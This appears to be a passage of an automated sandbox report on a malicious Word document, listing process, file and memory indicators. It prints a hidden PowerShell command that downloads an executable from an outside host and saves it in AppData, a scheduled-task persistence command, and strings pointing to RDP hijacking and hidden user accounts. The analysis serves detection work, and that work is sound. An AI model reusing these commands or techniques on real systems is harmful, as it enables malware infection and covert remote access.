          Source: Binary string: mscorlib.pdbment.Automation.pdbBB[xp source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: :\Windows\dll\mscorlib.pdbDr`g source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\System.pdbUy source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
          Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.drInitial sample: OLE indicators vbamacros = False

          Data Obfuscation

          Source: explorer[1].exe.0.dr, GUI/DangNhap.cs.Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: explorer.exe.4.dr, GUI/DangNhap.cs.Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: eDdYRRbouy.exe.8.dr, GUI/DangNhap.cs.Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.explorer.exe.1330000.0.unpack, GUI/DangNhap.cs.Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 8_2_05893E1C push esi; ret
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_05F06979 push ebx; retn 0000h
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_05F06930 push ebx; retn 0000h
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_05F06C80 push ebp; retn 0000h
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_05F06850 push edx; retn 0000h
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_05F06808 push edx; retn 0000h
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_05F06AE0 push esp; retn 0000h
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_05F06A99 push esp; retn 0000h
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_05F03E1C push esi; ret
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 29_2_05503E1C push esi; ret
          Source: explorer[1].exe.0.drStatic PE information: 0xA015504D [Tue Feb 9 02:02:53 2055 UTC]

          Persistence and Installation Behavior

          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
          Source: C:\Users\user\AppData\Roaming\explorer.exeFile created: C:\Users\user\AppData\Roaming\eDdYRRbouy.exe
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exe

          Boot Survival

          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp

          Hooking and other Techniques for Hiding and Protection

          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Windows\SysWOW64\:Zone.Identifier read attributes | delete
          Source: explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: MSBuild.exe, 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: MSBuild.exe, 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: MSBuild.exe, 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: MSBuild.exe, 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: MSBuild.exe, 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: MSBuild.exe, 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: MSBuild.exe, 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: MSBuild.exe, 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: explorer.exe, 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: explorer.exe, 0000001D.00000002.1032860739.00000000028B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess information set: NOOPENFILEERRORBOX
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exe Process information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess information set: NOOPENFILEERRORBOX
